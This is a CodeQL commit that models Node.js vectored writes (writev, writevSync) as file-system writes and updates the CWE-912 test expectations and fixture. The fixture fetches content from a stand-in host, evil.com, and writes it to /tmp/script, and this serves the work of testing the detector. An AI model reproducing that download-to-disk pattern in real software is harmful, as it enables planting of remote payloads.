Added NodeJSFileSystemVectorWrite class for vectored write.

Author: Napalys

javascript/ql/lib/semmle/javascript/frameworks/NodeJSLib.qll

@@ -601,6 +601,13 @@ module NodeJSLib {
     }
   }
 
+  /** A vectored write to the file system using `writev` or `writevSync` methods. */
+  private class NodeJSFileSystemVectorWrite extends FileSystemWriteAccess, NodeJSFileSystemAccess {
+    NodeJSFileSystemVectorWrite() { methodName = ["writev", "writevSync"] }
+
+    override DataFlow::Node getADataNode() { result = this.getArgument(1) }
+  }
+
   /** A file system read. */
   private class NodeJSFileSystemAccessRead extends FileSystemReadAccess, NodeJSFileSystemAccess {
     NodeJSFileSystemAccessRead() { methodName = ["read", "readSync", "readFile", "readFileSync"] }

javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.expected

@@ -1,10 +1,16 @@
 #select
 | HttpToFileAccess.js:6:37:6:37 | d | HttpToFileAccess.js:5:18:5:18 | d | HttpToFileAccess.js:6:37:6:37 | d | Write to file system depends on $@. | HttpToFileAccess.js:5:18:5:18 | d | Untrusted data |
+| HttpToFileAccess.js:14:21:14:23 | [d] | HttpToFileAccess.js:12:18:12:18 | d | HttpToFileAccess.js:14:21:14:23 | [d] | Write to file system depends on $@. | HttpToFileAccess.js:12:18:12:18 | d | Untrusted data |
+| HttpToFileAccess.js:18:46:18:48 | [d] | HttpToFileAccess.js:12:18:12:18 | d | HttpToFileAccess.js:18:46:18:48 | [d] | Write to file system depends on $@. | HttpToFileAccess.js:12:18:12:18 | d | Untrusted data |
 | tst.js:16:33:16:33 | c | tst.js:15:26:15:26 | c | tst.js:16:33:16:33 | c | Write to file system depends on $@. | tst.js:15:26:15:26 | c | Untrusted data |
 | tst.js:19:25:19:25 | c | tst.js:15:26:15:26 | c | tst.js:19:25:19:25 | c | Write to file system depends on $@. | tst.js:15:26:15:26 | c | Untrusted data |
 | tst.js:24:22:24:22 | c | tst.js:15:26:15:26 | c | tst.js:24:22:24:22 | c | Write to file system depends on $@. | tst.js:15:26:15:26 | c | Untrusted data |
 edges
 | HttpToFileAccess.js:5:18:5:18 | d | HttpToFileAccess.js:6:37:6:37 | d | provenance |  |
+| HttpToFileAccess.js:12:18:12:18 | d | HttpToFileAccess.js:14:22:14:22 | d | provenance |  |
+| HttpToFileAccess.js:12:18:12:18 | d | HttpToFileAccess.js:18:47:18:47 | d | provenance |  |
+| HttpToFileAccess.js:14:22:14:22 | d | HttpToFileAccess.js:14:21:14:23 | [d] | provenance |  |
+| HttpToFileAccess.js:18:47:18:47 | d | HttpToFileAccess.js:18:46:18:48 | [d] | provenance |  |
 | tst.js:15:26:15:26 | c | tst.js:16:33:16:33 | c | provenance |  |
 | tst.js:15:26:15:26 | c | tst.js:16:33:16:33 | c | provenance |  |
 | tst.js:15:26:15:26 | c | tst.js:19:25:19:25 | c | provenance |  |
@@ -15,6 +21,11 @@ edges
 nodes
 | HttpToFileAccess.js:5:18:5:18 | d | semmle.label | d |
 | HttpToFileAccess.js:6:37:6:37 | d | semmle.label | d |
+| HttpToFileAccess.js:12:18:12:18 | d | semmle.label | d |
+| HttpToFileAccess.js:14:21:14:23 | [d] | semmle.label | [d] |
+| HttpToFileAccess.js:14:22:14:22 | d | semmle.label | d |
+| HttpToFileAccess.js:18:46:18:48 | [d] | semmle.label | [d] |
+| HttpToFileAccess.js:18:47:18:47 | d | semmle.label | d |
 | tst.js:15:26:15:26 | c | semmle.label | c |
 | tst.js:16:33:16:33 | c | semmle.label | c |
 | tst.js:16:33:16:33 | c | semmle.label | c |

javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js

@@ -9,13 +9,13 @@ https.get('https://evil.com/script', res => {
 
 
 https.get('https://evil.com/script', res => {
-  res.on("data", d => { // $ MISSING: Source
+  res.on("data", d => { // $ Source
     fs.open("/tmp/script", 'r', (err, fd) => {
-      fs.writev(fd, [d], (err, bytesWritten) => { // $ MISSING: Alert
+      fs.writev(fd, [d], (err, bytesWritten) => { // $ Alert
         console.log(`Wrote ${bytesWritten} bytes`);
       });
 
-      const bytesWritten = fs.writevSync(fd, [d]); // $ MISSING: Alert
+      const bytesWritten = fs.writevSync(fd, [d]); // $ Alert
     });
   });
 });